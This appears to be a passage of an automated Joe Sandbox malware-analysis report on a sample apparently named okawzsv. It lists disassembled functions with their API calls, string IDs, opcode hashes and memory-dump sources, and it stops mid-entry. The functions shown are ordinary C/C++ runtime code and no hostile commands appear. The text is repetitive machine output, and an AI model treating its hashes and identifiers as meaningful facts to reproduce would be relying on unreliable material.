                                                                                                                        • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                                                        • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                                                        • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00403A9E
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AA9
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AB4
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403ABF
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403ACA
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AD5
                                                                                                                        • _Yarn.LIBCPMTD ref: 00403AE0
                                                                                                                        • std::bad_exception::bad_exception.LIBCMTD ref: 00403AF3
                                                                                                                          • Part of subcall function 00403E90: std::exception::exception.LIBCMT ref: 00403E9E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403B01
                                                                                                                          • Part of subcall function 0040FA12: RaiseException.KERNEL32(?,?,02FAF080,0042E150,?,?,?,?,?,0040E240,02FAF080,0042E150,?,00000001), ref: 0040FA67
                                                                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00403B0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Yarn$std::_$ExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                        • String ID: bad locale name
                                                                                                                        • API String ID: 747793647-1405518554
                                                                                                                        • Opcode ID: cc551e127de3a2cd77c308696d2c628c746ac2099f56c90b745b4e668e887d71
                                                                                                                        • Instruction ID: 3a41833131820623e3360e0a2c365f6045fcb50588cc8f7903fdc20afb8ce1d1
                                                                                                                        • Opcode Fuzzy Hash: cc551e127de3a2cd77c308696d2c628c746ac2099f56c90b745b4e668e887d71
                                                                                                                        • Instruction Fuzzy Hash: 69019E30A00108EBDB08EF95D992A6D7779AF40709F54056EE502372C2DE386F149759
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00408604
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8Throw
                                                                                                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                        • API String ID: 2005118841-1866435925
                                                                                                                        • Opcode ID: 095c778286030ddf1f39e050fa46c2539d89f0176b6456a287d68998bc704e40
                                                                                                                        • Instruction ID: 7952489c123dc5d280b15e348ececa5c6b2e4747948209149beb5f84c107d689
                                                                                                                        • Opcode Fuzzy Hash: 095c778286030ddf1f39e050fa46c2539d89f0176b6456a287d68998bc704e40
                                                                                                                        • Instruction Fuzzy Hash: 7821B130A00208EBCB14DB91E982FAEB374BF40700F65846EA5117B2C1DA79AE05DB4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strcspnctype$_localeconvstd::ios_base::width
                                                                                                                        • String ID: @$`gB$`gB
                                                                                                                        • API String ID: 4159833505-742010302
                                                                                                                        • Opcode ID: a986c5b67f102994afda9544e43b04955c9acb4efee2bb822a4eb5d51c7475b9
                                                                                                                        • Instruction ID: 010c020e6cf52a58f97a234e92f7860b2830957bbb357596f8136ef6bf8641f5
                                                                                                                        • Opcode Fuzzy Hash: a986c5b67f102994afda9544e43b04955c9acb4efee2bb822a4eb5d51c7475b9
                                                                                                                        • Instruction Fuzzy Hash: C9F1F8B5900109ABCB08DF99D991AEFB7B5FF88304F14816EF505AB291D738AE40CF94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040CF10
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CF1A
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040CF31
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040CF3A
                                                                                                                        • codecvt.LIBCPMT ref: 0040CF54
                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 0040CF68
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040CF76
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 0040CF8C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exceptionstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1757418035-3145022300
                                                                                                                        • Opcode ID: 3cb3a74f8e4f506f0c1d3f82f69251a16fccd7f1ddd4eed735db568ccc0c535f
                                                                                                                        • Instruction ID: 19f7fe5675ce0e5978de3ff8e6462b91015e0e19ef9fc73de280713c8d44387f
                                                                                                                        • Opcode Fuzzy Hash: 3cb3a74f8e4f506f0c1d3f82f69251a16fccd7f1ddd4eed735db568ccc0c535f
                                                                                                                        • Instruction Fuzzy Hash: 7701A172A00125EBCB01EBA0D882AAE7364AF44718F10467FF5117B2D1CB3C9D048B99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040304B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040305D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040306C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: X3C$bad cast
                                                                                                                        • API String ID: 1593993370-2230144185
                                                                                                                        • Opcode ID: 4da0f230d056abf04e62b398d5266f196784bc72ebfa4069f42f0cd97be51fe9
                                                                                                                        • Instruction ID: 55690cea464c4dbb2c7cfbb3d66d12b7f2b94a0abb7bb9d2a3c4c5dc0e74c2fd
                                                                                                                        • Opcode Fuzzy Hash: 4da0f230d056abf04e62b398d5266f196784bc72ebfa4069f42f0cd97be51fe9
                                                                                                                        • Instruction Fuzzy Hash: 7C212C74E00108EBCB04DF94D9919AEBBB4AB48305F2082BAE90577381DB35AF41DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402E0B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402E1D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402E2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast$d3C
                                                                                                                        • API String ID: 1593993370-4251626575
                                                                                                                        • Opcode ID: 3a86281c92186e7b335341803651f954b2c3724d4880b640c3c5bed5166a739a
                                                                                                                        • Instruction ID: 1530d595243c9370b8b92e9043dde409adc899d4696ee514b7f5e55f32978647
                                                                                                                        • Opcode Fuzzy Hash: 3a86281c92186e7b335341803651f954b2c3724d4880b640c3c5bed5166a739a
                                                                                                                        • Instruction Fuzzy Hash: 61212C74D00208EBCB04DFA4D985AAEB7B0AB48304F2081BAE915773D1DB78AF40CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040310B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 0040311D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 0040312C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: `3C$bad cast
                                                                                                                        • API String ID: 1593993370-2529692739
                                                                                                                        • Opcode ID: 8baf8d84d8f509ad206477f4294b2497a331954686ef592380c7d5d8d2fe544e
                                                                                                                        • Instruction ID: bbe032f1b406c17f45b64794562d7dc04279e42c4a88ada5befe02f2ea74e629
                                                                                                                        • Opcode Fuzzy Hash: 8baf8d84d8f509ad206477f4294b2497a331954686ef592380c7d5d8d2fe544e
                                                                                                                        • Instruction Fuzzy Hash: 4B21CD74D00108EBCB04DFA5D9819EEB7B5AB48305F2082BAE515773D1DB385F44DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402ECB
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402EDD
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402EEC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1593993370-3145022300
                                                                                                                        • Opcode ID: b035913ce5c65f0acd8cf6863cd217db0b5de48ab6ef34d05d06a22902111699
                                                                                                                        • Instruction ID: 21ed68f73c1e94b83709bc9fba53b6b65c7cbb65d230ed01b1b0ffca5846ae76
                                                                                                                        • Opcode Fuzzy Hash: b035913ce5c65f0acd8cf6863cd217db0b5de48ab6ef34d05d06a22902111699
                                                                                                                        • Instruction Fuzzy Hash: 7B212C74D00209EBCB04DFA4D985AAEB7B0EB48304F2081BAE915773C1DB74AF40DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00402F8B
                                                                                                                          • Part of subcall function 0040C1C8: __lock.LIBCMT ref: 0040C1D9
                                                                                                                        • int.LIBCPMTD ref: 00402F9D
                                                                                                                          • Part of subcall function 004049B0: std::_Lockit::_Lockit.LIBCPMT ref: 004049C6
                                                                                                                        • std::locale::_Getfacet.LIBCPMTD ref: 00402FAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Getfacet__lockstd::locale::_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 1593993370-3145022300
                                                                                                                        • Opcode ID: 00d6910303ace36632adcdb45d9fb62738e97d0be1a976c6303b2dc0169dee16
                                                                                                                        • Instruction ID: bdd014f9d6285fea9febaa0a79cf14112ea20f29fdb61fe9ff84341db7ec45c5
                                                                                                                        • Opcode Fuzzy Hash: 00d6910303ace36632adcdb45d9fb62738e97d0be1a976c6303b2dc0169dee16
                                                                                                                        • Instruction Fuzzy Hash: 5921FC74E00109EBCB04DF94D9819EEB7B4AB48305F2082BAE505773D1DB78AF41DB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • ____lc_codepage_func.LIBCMT ref: 0040C3A6
                                                                                                                        • __calloc_crt.LIBCMT ref: 0040C3B7
                                                                                                                          • Part of subcall function 004120B3: __calloc_impl.LIBCMT ref: 004120C2
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040C3CA
                                                                                                                        • _memmove.LIBCMT ref: 0040C3D3
                                                                                                                        • ___pctype_func.LIBCMT ref: 0040C3E4
                                                                                                                        • ____lc_locale_name_func.LIBCMT ref: 0040C3F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
                                                                                                                        • String ID: B
                                                                                                                        • API String ID: 1321936363-3806887055
                                                                                                                        • Opcode ID: a87319a5170ce802def29d0fc22c9df1dd79b762334036f69ce4bbb537025eeb
                                                                                                                        • Instruction ID: 3000733e9fba5eca00f5c1d353237309ea9df9ed4da175b0931c95f52ec26c71
                                                                                                                        • Opcode Fuzzy Hash: a87319a5170ce802def29d0fc22c9df1dd79b762334036f69ce4bbb537025eeb
                                                                                                                        • Instruction Fuzzy Hash: B3F0C2755047019BD7207FA6D842B977BD89F04754F10C43FF698D76A2DB78E8808B89
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004163C9: __getptd_noexit.LIBCMT ref: 004163CA
                                                                                                                        • EncodePointer.KERNEL32(00000000), ref: 0041107D
                                                                                                                        • _CallSETranslator.LIBCMT ref: 004110B3
                                                                                                                        • _GetRangeOfTrysToCheck.LIBCMT ref: 004110DD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CallCheckEncodePointerRangeTranslatorTrys__getptd_noexit
                                                                                                                        • String ID: MOC$RCC$ZS
                                                                                                                        • API String ID: 3337196757-2129068654
                                                                                                                        • Opcode ID: a18941b9a9a7d2f89688fb2d102dc6d8e522c664d440ee5d25321fbffed3a3ba
                                                                                                                        • Instruction ID: b0a86199b773dd500d54aac0547a615f8cc7fd901e3e5eb0994ec731192b32a4
                                                                                                                        • Opcode Fuzzy Hash: a18941b9a9a7d2f89688fb2d102dc6d8e522c664d440ee5d25321fbffed3a3ba
                                                                                                                        • Instruction Fuzzy Hash: 0B416A32500249AFDF21CF44C881EEEBBA6FF48314F19819AFA1457261C379AD91CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __init_pointers.LIBCMT ref: 00416503
                                                                                                                          • Part of subcall function 004153E1: EncodePointer.KERNEL32(00000000,?,00416508,0041068C,0042E4C8,00000014), ref: 004153E4
                                                                                                                          • Part of subcall function 004153E1: __initp_misc_winsig.LIBCMT ref: 004153FF
                                                                                                                        • __mtinitlocks.LIBCMT ref: 00416508
                                                                                                                        • __mtterm.LIBCMT ref: 00416511
                                                                                                                        • __calloc_crt.LIBCMT ref: 00416536
                                                                                                                        • __initptd.LIBCMT ref: 00416558
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041655F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentEncodePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1469070506-0
                                                                                                                        • Opcode ID: 230950c743a8e0d294ef02d5d58ab4ea8ef5b4225b169417a7e73c4916ecec56
                                                                                                                        • Instruction ID: b154347d85d495ea19d7033877c085535a8166e006bad3d9ea4269fccca8eb89
                                                                                                                        • Opcode Fuzzy Hash: 230950c743a8e0d294ef02d5d58ab4ea8ef5b4225b169417a7e73c4916ecec56
                                                                                                                        • Instruction Fuzzy Hash: DEF0F0325097112AE6347B367D027CB2BA28B41B38B22062FF424C41E6FFACD4C1819C
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00406250: _localeconv.LIBCMT ref: 00406257
                                                                                                                          • Part of subcall function 00406170: __Getcvt.LIBCPMT ref: 0040617F
                                                                                                                        • _Maklocchr.LIBCPMTD ref: 004069DF
                                                                                                                        • _Maklocchr.LIBCPMTD ref: 004069F6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Maklocchr$Getcvt_localeconv
                                                                                                                        • String ID: PdB`@$`@
                                                                                                                        • API String ID: 4220647775-2941669558
                                                                                                                        • Opcode ID: 98609bdb16613f20f6d6d6463da8d270b2eedd82cf8c78b4577562e24e0e1804
                                                                                                                        • Instruction ID: 534d5f74b59b053b1341c35075627e1c8f2461e40e2f8ad959eae66e21ecd0b9
                                                                                                                        • Opcode Fuzzy Hash: 98609bdb16613f20f6d6d6463da8d270b2eedd82cf8c78b4577562e24e0e1804
                                                                                                                        • Instruction Fuzzy Hash: 6C4171B5A00208ABCB04EF91C951BAFB775EF84714F20812EE9067B3C1D7759A41CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 0041B2B8
                                                                                                                          • Part of subcall function 004122B3: __FF_MSGBANNER.LIBCMT ref: 004122CA
                                                                                                                          • Part of subcall function 004122B3: __NMSG_WRITE.LIBCMT ref: 004122D1
                                                                                                                          • Part of subcall function 004122B3: RtlAllocateHeap.NTDLL(00500000,00000000,00000001,00000000,00000000,00000000,?,00412111,?,?,?,00000000,?,0041085D,00000018,0042E4E8), ref: 004122F6
                                                                                                                        • _free.LIBCMT ref: 0041B2CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1020059152-0
                                                                                                                        • Opcode ID: a795e9e31375394ebc980fec7878f460e182967e85213140fa55d0200dea7141
                                                                                                                        • Instruction ID: b2389dc75f3e599ccbf8f53cbf2b5fa3c824b862e293ae698bebec6b36274e7e
                                                                                                                        • Opcode Fuzzy Hash: a795e9e31375394ebc980fec7878f460e182967e85213140fa55d0200dea7141
                                                                                                                        • Instruction Fuzzy Hash: 5F11C132904619ABCB216B75AC097DF3798DF04364B10456BFE15DA290DB7C89E086DC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427045233-3916222277
                                                                                                                        • Opcode ID: ad9f29b0787348e55b470ae4f5b85b912d51ed206bd02ae5a77dd0ad3a5b9d7d
                                                                                                                        • Instruction ID: 2e860a05d43275ab0c514d4b4700c01f53cc27874e5ecff2fd4257cdeb013678
                                                                                                                        • Opcode Fuzzy Hash: ad9f29b0787348e55b470ae4f5b85b912d51ed206bd02ae5a77dd0ad3a5b9d7d
                                                                                                                        • Instruction Fuzzy Hash: 77514A76D00219AFDF14DFE4D490AEEBBB5BF08314F14402BE551B7680D734A949CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.1278471440.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.1278456869.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278493801.0000000000426000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000002.00000002.1278511145.0000000000430000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_400000_okawzsv.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
